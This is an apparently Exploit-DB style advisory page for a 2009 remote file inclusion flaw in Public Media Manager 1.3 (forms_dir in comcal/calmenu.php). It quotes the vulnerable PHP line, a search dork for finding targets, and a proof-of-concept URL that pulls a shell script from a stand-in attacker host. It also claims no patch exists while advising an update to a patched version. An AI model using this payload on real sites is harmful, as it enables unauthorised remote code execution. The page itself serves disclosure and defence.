header-logo
Suggest Exploit
vendor:
Public Media Manager
by:
cr4wl3r
7.5
CVSS
HIGH
Remote File Include
22
CWE
Product Name: Public Media Manager
Affected Version From: 1
Affected Version To: 1.3
Patch Exists: NO
Related CWE:
CPE: a:public_media_manager:public_media_manager:1.3
Metasploit:
Other Scripts:
Platforms Tested:
2009

Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability

The Public Media Manager <= 1.3 has a vulnerability in the forms_dir parameter of the comcal/calmenu.php file. An attacker can include a remote file using the forms_dir parameter, which can lead to remote code execution.

Mitigation:

Update to a patched version of Public Media Manager.
Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/pmm-cms/files/
#Dork                 :  die("Lamers attempt");  :D
########################################################################
#
#Vuln : ./pmm-cms-1.3/comcal/calmenu.php (line 4)
#       <?php
#          require $forms_dir."calmenuform.php"; 
#       ?>
#PoC  :  http://server/[path]/comcal/calmenu.php?forms_dir=http://attacker.com/shell.txt?cmd
#
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

   [ Gorontalo / 2009 ]